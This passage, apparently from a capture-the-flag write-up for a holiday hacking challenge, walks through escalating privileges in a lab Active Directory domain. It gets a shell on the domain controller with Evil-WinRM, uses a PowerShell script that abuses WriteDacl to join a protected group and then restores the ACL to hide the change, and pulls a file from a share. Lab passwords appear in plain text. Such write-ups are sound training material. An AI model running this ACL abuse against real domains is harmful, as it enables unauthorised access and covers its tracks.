&lt;span class="go"&gt;whencreated:           2021-10-29 19:25:30+00:00&lt;/span&gt;
&lt;span class="go"&gt;whenchanged:           2022-01-04 09:29:21+00:00&lt;/span&gt;
&lt;span class="go"&gt;displayname:           Remote Elf&lt;/span&gt;
&lt;span class="go"&gt;usncreated:            12779&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;memberof:              CN=Remote Management Domain Users,CN=Users,DC=elfu,DC=local,&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="go"&gt;                       CN=Remote Management Users,CN=Builtin,DC=elfu,DC=local&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;usnchanged:            103149&lt;/span&gt;
&lt;span class="go"&gt;name:                  Remote Elf User Account&lt;/span&gt;
&lt;span class="go"&gt;objectguid:            {d74a6e5f-1354-4d5a-bfc3-afd4cb45ae3a}&lt;/span&gt;
&lt;span class="go"&gt;useraccountcontrol:    NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD&lt;/span&gt;
&lt;span class="go"&gt;badpwdcount:           0&lt;/span&gt;
&lt;span class="go"&gt;codepage:              0&lt;/span&gt;
&lt;span class="go"&gt;countrycode:           0&lt;/span&gt;
&lt;span class="go"&gt;badpasswordtime:       1601-01-01 00:00:00+00:00&lt;/span&gt;
&lt;span class="go"&gt;lastlogoff:            1601-01-01 00:00:00+00:00&lt;/span&gt;
&lt;span class="go"&gt;lastlogon:             2022-01-04 12:52:36.739220+00:00&lt;/span&gt;
&lt;span class="go"&gt;pwdlastset:            2021-10-29 19:25:30.961706+00:00&lt;/span&gt;
&lt;span class="go"&gt;primarygroupid:        513&lt;/span&gt;
&lt;span class="go"&gt;objectsid:             S-1-5-21-2037236562-2033616742-1485113978-1106&lt;/span&gt;
&lt;span class="go"&gt;accountexpires:        9999-12-31 23:59:59.999999+00:00&lt;/span&gt;
&lt;span class="go"&gt;logoncount:            15807&lt;/span&gt;
&lt;span class="go"&gt;samaccountname:        remote_elf&lt;/span&gt;
&lt;span class="go"&gt;samaccounttype:        805306368&lt;/span&gt;
&lt;span class="go"&gt;userprincipalname:     remote_elf@elfu.local&lt;/span&gt;
&lt;span class="go"&gt;objectcategory:        CN=Person,CN=Schema,CN=Configuration,DC=elfu,DC=local&lt;/span&gt;
&lt;span class="go"&gt;dscorepropagationdata: 2021-10-29 19:25:30+00:00, 1601-01-01 00:00:00+00:00&lt;/span&gt;
&lt;span class="go"&gt;lastlogontimestamp:    2022-01-04 09:29:21.901789+00:00&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;code&gt;ELFU.LOCAL\remote_elf&lt;/code&gt; is a member of &lt;code&gt;Remote Management Domain
Users&lt;/code&gt;, and &lt;code&gt;Remote Management Users&lt;/code&gt;. If we look at the descriptions of
these groups, we respectively find:&lt;/p&gt;
&lt;blockquote&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;Members of this group are able to winrm into domain machines. Equivilant
to being in the localgroup &amp;quot;Remote Management Users&amp;quot;&lt;/li&gt;
&lt;li&gt;Members of this group can access WMI resources over management protocols
(such as WS-Management via the Windows Remote Management service). This
applies only to WMI namespaces that grant access to the user.&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;
&lt;p&gt;So, we can remotely &lt;code&gt;winrm&lt;/code&gt; on domain machines. If we look at script
&lt;code&gt;GetProcessInfo.ps1&lt;/code&gt;, where we found the password, we see that
&lt;code&gt;ELFU.LOCAL\remote_elf&lt;/code&gt; can &lt;code&gt;Invoke-Command&lt;/code&gt; on 10.128.1.53,
the Domain Controller.&lt;/p&gt;
&lt;p&gt;We can use &lt;a class="reference external" href="https://github.com/Hackplayers/evil-winrm"&gt;Evil-WinRM&lt;/a&gt; to obtain
a shell on the Domain Controller:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; proxychains evil-winrm -i &lt;span class="m"&gt;10&lt;/span&gt;.128.1.53 -u remote_elf -p &lt;span class="s1"&gt;&amp;#39;A1d655f7f5d98b10!&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;ProxyChains-3.1 (http://proxychains.sf.net)&lt;/span&gt;

&lt;span class="go"&gt;Evil-WinRM shell v3.3&lt;/span&gt;

&lt;span class="go"&gt;Info: Establishing connection to remote endpoint&lt;/span&gt;

&lt;span class="go"&gt;|S-chain|-&amp;lt;&amp;gt;-127.0.0.1:4242-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-10.128.1.53:5985-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-OK&lt;/span&gt;
&lt;span class="go"&gt;*Evil-WinRM* PS C:\Users\remote_elf\Documents&amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Hurray! But now, what to do? Well, when taking a look at the Remote Management
groups, I stumbled upon another interesting group, called &lt;code&gt;Research
Department&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; proxychains pywerview get-netgroup -t &lt;span class="m"&gt;10&lt;/span&gt;.128.1.53 -u xojpwgcens -p &lt;span class="s1"&gt;&amp;#39;Xuuqgefth#&amp;#39;&lt;/span&gt; --full-data --groupname &lt;span class="s1"&gt;&amp;#39;Research Department&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;ProxyChains-3.1 (http://proxychains.sf.net)&lt;/span&gt;
&lt;span class="go"&gt;|S-chain|-&amp;lt;&amp;gt;-127.0.0.1:4242-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-10.128.1.53:445-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-OK&lt;/span&gt;
&lt;span class="go"&gt;|S-chain|-&amp;lt;&amp;gt;-127.0.0.1:4242-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-10.128.1.53:445-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-OK&lt;/span&gt;
&lt;span class="go"&gt;|S-chain|-&amp;lt;&amp;gt;-127.0.0.1:4242-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-10.128.1.53:389-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-OK&lt;/span&gt;
&lt;span class="go"&gt;objectclass:           top, group&lt;/span&gt;
&lt;span class="go"&gt;cn:                    Research Department&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;description:           Members of this group have access to all ElfU research resources/shares.&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="go"&gt;member:                CN=fbzpsvxdeh,CN=Users,DC=elfu,DC=local, CN=dbevvcejny,CN=Users,DC=elfu,DC=local,&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="go"&gt;                       CN=xdtqjfinpd,CN=Users,DC=elfu,DC=local, CN=qcljgnpsjl,CN=Users,DC=elfu,DC=local,&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="go"&gt;                       CN=test,CN=Users,DC=elfu,DC=local&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;distinguishedname:     CN=Research Department,CN=Users,DC=elfu,DC=local&lt;/span&gt;
&lt;span class="go"&gt;instancetype:          4&lt;/span&gt;
&lt;span class="go"&gt;whencreated:           2021-10-29 19:25:31+00:00&lt;/span&gt;
&lt;span class="go"&gt;whenchanged:           2022-01-04 09:53:03+00:00&lt;/span&gt;
&lt;span class="go"&gt;displayname:           Research Department&lt;/span&gt;
&lt;span class="go"&gt;usncreated:            12794&lt;/span&gt;
&lt;span class="go"&gt;usnchanged:            105213&lt;/span&gt;
&lt;span class="go"&gt;name:                  Research Department&lt;/span&gt;
&lt;span class="go"&gt;objectguid:            {8dd5ece3-bdc8-4d02-9356-df01fb0e5f3d}&lt;/span&gt;
&lt;span class="go"&gt;objectsid:             S-1-5-21-2037236562-2033616742-1485113978-1108&lt;/span&gt;
&lt;span class="go"&gt;samaccountname:        ResearchDepartment&lt;/span&gt;
&lt;span class="go"&gt;samaccounttype:        268435456&lt;/span&gt;
&lt;span class="go"&gt;grouptype:             -2147483646&lt;/span&gt;
&lt;span class="go"&gt;objectcategory:        CN=Group,CN=Schema,CN=Configuration,DC=elfu,DC=local&lt;/span&gt;
&lt;span class="go"&gt;dscorepropagationdata: 2022-01-04 09:45:46+00:00, 2021-12-02 15:58:33+00:00, 2021-11-30 15:28:57+00:00,&lt;/span&gt;
&lt;span class="go"&gt;                       2021-11-01 15:11:24+00:00, 1601-01-01 00:00:00+00:00&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This group has full access to research shares. It also seems as if other
contestants were able to add their user to this group. If &lt;em&gt;we&lt;/em&gt; were a member of
this group, we could read the content of &lt;code&gt;\\10.128.3.30\research_dep&lt;/code&gt;!
Can we use our &lt;code&gt;ELFU.LOCAL\remote_elf&lt;/code&gt; account to add our user to this
group? Let's try:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;PS C:\Users\remote_elf\Documents&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;net&lt;/span&gt; &lt;span class="nb"&gt;group &lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;ResearchDepartment&amp;quot;&lt;/span&gt; &lt;span class="n"&gt;xojpwgcens&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;add&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;domain&lt;/span&gt;
&lt;span class="go"&gt;|S-chain|-&amp;lt;&amp;gt;-127.0.0.1:4242-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-10.128.1.53:5985-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-OK&lt;/span&gt;
&lt;span class="go"&gt;|S-chain|-&amp;lt;&amp;gt;-127.0.0.1:4242-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-10.128.1.53:5985-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-OK&lt;/span&gt;
&lt;span class="go"&gt;net.exe : System error 5 has occurred.&lt;/span&gt;
&lt;span class="go"&gt;    + CategoryInfo          : NotSpecified: (System error 5 has occurred.:String) [], RemoteException&lt;/span&gt;
&lt;span class="go"&gt;    + FullyQualifiedErrorId : NativeCommandError&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;Access is denied.&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;No such luck. So, we can't directly add our user to this group. But maybe we
can find a way to do it indirectly? Let's take a look at the ACLs of the
&lt;code&gt;Research Department&lt;/code&gt; group:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;PS C:\Users\remote_elf\Documents&amp;gt; &lt;/span&gt;&lt;span class="nb"&gt;Import-Module&lt;/span&gt; &lt;span class="n"&gt;ActiveDirectory&lt;/span&gt;
&lt;span class="gp"&gt;PS C:\Windows&amp;gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;Get-ACL&lt;/span&gt; &lt;span class="n"&gt;-Path&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;AD:CN=Research Department,CN=Users,DC=elfu,DC=local&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="n"&gt;Access&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="nb"&gt;Where-Object&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nv"&gt;$_&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;IdentityReference&lt;/span&gt; &lt;span class="o"&gt;-Like&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;ELFU\remote_elf&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;


&lt;span class="hll"&gt;&lt;span class="go"&gt;ActiveDirectoryRights : WriteDacl&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;InheritanceType       : None&lt;/span&gt;
&lt;span class="go"&gt;ObjectType            : 00000000-0000-0000-0000-000000000000&lt;/span&gt;
&lt;span class="go"&gt;InheritedObjectType   : 00000000-0000-0000-0000-000000000000&lt;/span&gt;
&lt;span class="go"&gt;ObjectFlags           : None&lt;/span&gt;
&lt;span class="go"&gt;AccessControlType     : Allow&lt;/span&gt;
&lt;span class="go"&gt;IdentityReference     : ELFU\remote_elf&lt;/span&gt;
&lt;span class="go"&gt;IsInherited           : False&lt;/span&gt;
&lt;span class="go"&gt;InheritanceFlags      : None&lt;/span&gt;
&lt;span class="go"&gt;PropagationFlags      : None&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Bingo! &lt;code&gt;ELFU.LOCAL\remote_elf&lt;/code&gt; can write new ACLs to &lt;code&gt;Research
Department&lt;/code&gt;. We can add a new Access Control Entry (ACE) allowing
&lt;code&gt;ELFU.LOCAL\remote_elf&lt;/code&gt; to modify &lt;code&gt;Research Department&lt;/code&gt;'s
&lt;code&gt;member&lt;/code&gt; attribute.&lt;/p&gt;
&lt;p&gt;We can create a small PowerShell script that will modify &lt;code&gt;Research
Department&lt;/code&gt;'s ACL and add our user to its members:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="c"&gt;# File acl_pwning.ps1&lt;/span&gt;
&lt;span class="nb"&gt;Import-Module&lt;/span&gt; &lt;span class="n"&gt;ActiveDirectory&lt;/span&gt;

&lt;span class="c"&gt;# We get the current ACL to the current R&amp;amp;D group&lt;/span&gt;
&lt;span class="nb"&gt;Write-Output&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;Getting ACL to current R&amp;amp;D group&amp;quot;&lt;/span&gt;
&lt;span class="nv"&gt;$rd_group&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;AD:CN=Research Department,CN=Users,DC=elfu,DC=local&amp;quot;&lt;/span&gt;
&lt;span class="nv"&gt;$acl&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;Get-Acl&lt;/span&gt; &lt;span class="n"&gt;-Path&lt;/span&gt; &lt;span class="nv"&gt;$rd_group&lt;/span&gt;

&lt;span class="c"&gt;# We build the new ACE, which allows ELFU\remote_elf to add new members to the group&lt;/span&gt;
&lt;span class="nb"&gt;Write-Output&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;Building new ACE&amp;quot;&lt;/span&gt;
&lt;span class="nv"&gt;$remote_elf_sid&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;Get-ADUser&lt;/span&gt; &lt;span class="n"&gt;-Identity&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;remote_elf&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="n"&gt;SID&lt;/span&gt;
&lt;span class="nv"&gt;$ad_rights&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="no"&gt;[System.DirectoryServices.ActiveDirectoryRights]&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="n"&gt;WriteProperty&lt;/span&gt;
&lt;span class="nv"&gt;$type&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="no"&gt;[System.Security.AccessControl.AccessControlType]&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="n"&gt;Allow&lt;/span&gt;
&lt;span class="nv"&gt;$member_attr_guid&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;bf9679c0-0de6-11d0-a285-00aa003049e2&amp;quot;&lt;/span&gt; &lt;span class="c"&gt;# GUID to the members attribute, see https://docs.microsoft.com/en-us/windows/win32/adschema/a-member&lt;/span&gt;
&lt;span class="nv"&gt;$inheritance_type&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="no"&gt;[DirectoryServices.ActiveDirectorySecurityInheritance]&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="n"&gt;All&lt;/span&gt;
&lt;span class="nv"&gt;$ace&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;New-Object&lt;/span&gt; &lt;span class="n"&gt;System&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;DirectoryServices&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ActiveDirectoryAccessRule&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$remote_elf_sid&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$ad_rights&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$type&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$member_attr_guid&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$inheritance_type&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="c"&gt;# We update the ACL with our new ACE&lt;/span&gt;
&lt;span class="nb"&gt;Write-Output&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;Adding new ACE and defining new ACL&amp;quot;&lt;/span&gt;
&lt;span class="nv"&gt;$acl&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;AddAccessRule&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$ace&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="nb"&gt;Set-Acl&lt;/span&gt; &lt;span class="n"&gt;-Path&lt;/span&gt; &lt;span class="nv"&gt;$rd_group&lt;/span&gt; &lt;span class="n"&gt;-AclObject&lt;/span&gt; &lt;span class="nv"&gt;$acl&lt;/span&gt;

&lt;span class="c"&gt;# We add our user to the group&lt;/span&gt;
&lt;span class="nb"&gt;Write-Output&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;Adding user to R&amp;amp;D group&amp;quot;&lt;/span&gt;
&lt;span class="n"&gt;net&lt;/span&gt; &lt;span class="nb"&gt;group &lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;ResearchDepartment&amp;quot;&lt;/span&gt; &lt;span class="n"&gt;xojpwgcens&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;add&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;domain&lt;/span&gt;

&lt;span class="c"&gt;# We restore the ACL of the group so that other contestants see the&lt;/span&gt;
&lt;span class="c"&gt;# &amp;quot;normal&amp;quot; configuration&lt;/span&gt;
&lt;span class="nb"&gt;Write-Output&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;Restoring original ACL&amp;quot;&lt;/span&gt;
&lt;span class="nv"&gt;$acl&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;RemoveAccessRule&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$ace&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="nb"&gt;Set-Acl&lt;/span&gt; &lt;span class="n"&gt;-Path&lt;/span&gt; &lt;span class="nv"&gt;$rd_group&lt;/span&gt; &lt;span class="n"&gt;-AclObject&lt;/span&gt; &lt;span class="nv"&gt;$acl&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let's upload our file and execute it:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;PS C:\Users\remote_elf\Documents&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;upload&lt;/span&gt; &lt;span class="n"&gt;acl_pwning&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ps1&lt;/span&gt;
&lt;span class="go"&gt;Info: Uploading acl_pwning.ps1 to C:\Users\remote_elf\Documents\acl_pwning.ps1&lt;/span&gt;

&lt;span class="go"&gt;Data: 1824 bytes of 1824 bytes copied&lt;/span&gt;

&lt;span class="go"&gt;Info: Upload successful!&lt;/span&gt;

&lt;span class="gp"&gt;PS C:\Users\remote_elf\Documents&amp;gt; &lt;/span&gt;&lt;span class="nb"&gt;Import-Module&lt;/span&gt; &lt;span class="p"&gt;.\&lt;/span&gt;&lt;span class="n"&gt;acl_pwning&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ps1&lt;/span&gt;
&lt;span class="go"&gt;Getting ACL to current R&amp;amp;D group&lt;/span&gt;
&lt;span class="go"&gt;Building new ACE&lt;/span&gt;
&lt;span class="go"&gt;Adding new ACE and defining new ACL&lt;/span&gt;
&lt;span class="go"&gt;Adding user to R&amp;amp;D group&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;The command completed successfully.&lt;/span&gt;
&lt;/span&gt;
&lt;span class="go"&gt;Restoring original ACL&lt;/span&gt;
&lt;span class="go"&gt;True&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let's check our user:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; proxychains pywerview get-netuser -t &lt;span class="m"&gt;10&lt;/span&gt;.128.1.53 -u xojpwgcens -p &lt;span class="s1"&gt;&amp;#39;Xuuqgefth#&amp;#39;&lt;/span&gt; --username xojpwgcens
&lt;span class="go"&gt;ProxyChains-3.1 (http://proxychains.sf.net)&lt;/span&gt;
&lt;span class="go"&gt;|S-chain|-&amp;lt;&amp;gt;-127.0.0.1:4242-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-10.128.1.53:445-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-OK&lt;/span&gt;
&lt;span class="go"&gt;|S-chain|-&amp;lt;&amp;gt;-127.0.0.1:4242-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-10.128.1.53:445-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-OK&lt;/span&gt;
&lt;span class="go"&gt;|S-chain|-&amp;lt;&amp;gt;-127.0.0.1:4242-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-10.128.1.53:389-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-OK&lt;/span&gt;
&lt;span class="go"&gt;objectclass:           top, person, organizationalPerson, user&lt;/span&gt;
&lt;span class="go"&gt;cn:                    xojpwgcens&lt;/span&gt;
&lt;span class="go"&gt;distinguishedname:     CN=xojpwgcens,CN=Users,DC=elfu,DC=local&lt;/span&gt;
&lt;span class="go"&gt;instancetype:          4&lt;/span&gt;
&lt;span class="go"&gt;whencreated:           2022-01-04 11:04:31+00:00&lt;/span&gt;
&lt;span class="go"&gt;whenchanged:           2022-01-04 11:32:09+00:00&lt;/span&gt;
&lt;span class="go"&gt;displayname:           xojpwgcens&lt;/span&gt;
&lt;span class="go"&gt;usncreated:            106001&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;memberof:              CN=Research Department,CN=Users,DC=elfu,DC=local&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;usnchanged:            106211&lt;/span&gt;
&lt;span class="go"&gt;name:                  xojpwgcens&lt;/span&gt;
&lt;span class="go"&gt;objectguid:            {7f9b8753-bdb0-4aa0-89dc-7495778c1c93}&lt;/span&gt;
&lt;span class="go"&gt;useraccountcontrol:    NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD&lt;/span&gt;
&lt;span class="go"&gt;badpwdcount:           0&lt;/span&gt;
&lt;span class="go"&gt;codepage:              0&lt;/span&gt;
&lt;span class="go"&gt;countrycode:           0&lt;/span&gt;
&lt;span class="go"&gt;badpasswordtime:       1601-01-01 00:00:00+00:00&lt;/span&gt;
&lt;span class="go"&gt;lastlogoff:            1601-01-01 00:00:00+00:00&lt;/span&gt;
&lt;span class="go"&gt;lastlogon:             2022-01-04 11:42:55.242935+00:00&lt;/span&gt;
&lt;span class="go"&gt;pwdlastset:            2022-01-04 11:04:31.463732+00:00&lt;/span&gt;
&lt;span class="go"&gt;primarygroupid:        513&lt;/span&gt;
&lt;span class="go"&gt;objectsid:             S-1-5-21-2037236562-2033616742-1485113978-1573&lt;/span&gt;
&lt;span class="go"&gt;accountexpires:        9999-12-31 23:59:59.999999+00:00&lt;/span&gt;
&lt;span class="go"&gt;logoncount:            1&lt;/span&gt;
&lt;span class="go"&gt;samaccountname:        xojpwgcens&lt;/span&gt;
&lt;span class="go"&gt;samaccounttype:        805306368&lt;/span&gt;
&lt;span class="go"&gt;userprincipalname:     xojpwgcens@elfu.local&lt;/span&gt;
&lt;span class="go"&gt;objectcategory:        CN=Person,CN=Schema,CN=Configuration,DC=elfu,DC=local&lt;/span&gt;
&lt;span class="go"&gt;dscorepropagationdata: 2022-01-04 11:04:31+00:00, 1601-01-01 00:00:00+00:00&lt;/span&gt;
&lt;span class="go"&gt;lastlogontimestamp:    2022-01-04 11:32:09.105534+00:00&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;It worked! We can now access the R&amp;amp;D share. We can use &lt;code&gt;impacket&lt;/code&gt;'s
&lt;a class="reference external" href="https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbclient.py"&gt;smbclient.py&lt;/a&gt;
(did I mention how much I love &lt;code&gt;impacket&lt;/code&gt;?)&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; proxychains smbclient.py &lt;span class="s1"&gt;&amp;#39;elfu.local/xojpwgcens:Xuuqgefth#@10.128.3.30&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;ProxyChains-3.1 (http://proxychains.sf.net)&lt;/span&gt;
&lt;span class="go"&gt;Impacket v0.9.25.dev1+20211027.123255.1dad8f7f - Copyright 2021 SecureAuth Corporation&lt;/span&gt;

&lt;span class="go"&gt;|S-chain|-&amp;lt;&amp;gt;-127.0.0.1:4242-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-10.128.3.30:445-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-OK&lt;/span&gt;
&lt;span class="go"&gt;Type help for list of commands&lt;/span&gt;
&lt;span class="gp"&gt;#&lt;/span&gt; use research_dep
&lt;span class="gp"&gt;#&lt;/span&gt; ls
&lt;span class="go"&gt;drw-rw-rw-          0  Thu Dec  2 17:39:42 2021 .&lt;/span&gt;
&lt;span class="go"&gt;drw-rw-rw-          0  Tue Jan  4 09:01:34 2022 ..&lt;/span&gt;
&lt;span class="go"&gt;-rw-rw-rw-     173932  Thu Dec  2 17:38:26 2021 SantaSecretToAWonderfulHolidaySeason.pdf&lt;/span&gt;
&lt;span class="gp"&gt;#&lt;/span&gt; get SantaSecretToAWonderfulHolidaySeason.pdf
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We can finally download the secret file
&lt;a class="reference external" href="/docs/sans-christmas-challenge-2021/SantaSecretToAWonderfulHolidaySeason.pdf"&gt;SantaSecretToAWonderfulHolidaySeason.pdf&lt;/a&gt;.
Here's what it says:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;This document contains Santa’s secrets to a wonderful Holiday Season. Santa
and his teams of elves and reindeer have spent many centuries working on
refining our approach to each of these items to do our small part to spread
them around the globe during the holiday season. Santa appointed a special
research team at Elf University, where our best scientists are devising
better ways that we can practice these precepts and share them with the
world.&lt;/p&gt;
&lt;p&gt;While constantly and continuously striving to do better on each of them, we
know we always fall short. In other words, there is always room for
improvement. Santa urges each elf and reindeer to carefully consider each
of these secret ingredients to a wonderful holiday season and to share them
as a gift to all they encounter.&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;strong&gt;Kindness&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;Sharing&lt;/li&gt;
&lt;li&gt;Joy&lt;/li&gt;
&lt;li&gt;Peace&lt;/li&gt;
&lt;li&gt;Cooperation&lt;/li&gt;
&lt;li&gt;Community&lt;/li&gt;
&lt;li&gt;Giving&lt;/li&gt;
&lt;li&gt;Decency&lt;/li&gt;
&lt;li&gt;Strength&lt;/li&gt;
&lt;li&gt;Gentleness&lt;/li&gt;
&lt;li&gt;Goodwill&lt;/li&gt;
&lt;li&gt;Graciousness&lt;/li&gt;
&lt;li&gt;Philanthropy&lt;/li&gt;
&lt;li&gt;Integrity&lt;/li&gt;
&lt;li&gt;Boldness&lt;/li&gt;
&lt;li&gt;Hospitality&lt;/li&gt;
&lt;li&gt;Patience&lt;/li&gt;
&lt;li&gt;Caring&lt;/li&gt;
&lt;li&gt;Sweetness&lt;/li&gt;
&lt;li&gt;Sympathy&lt;/li&gt;
&lt;li&gt;Understanding&lt;/li&gt;
&lt;li&gt;Unselfishness&lt;/li&gt;
&lt;li&gt;Congeniality&lt;/li&gt;
&lt;li&gt;Cordiality&lt;/li&gt;
&lt;li&gt;Friendliness&lt;/li&gt;
&lt;li&gt;Comity&lt;/li&gt;
&lt;li&gt;Neighborliness&lt;/li&gt;
&lt;li&gt;Benevolence&lt;/li&gt;
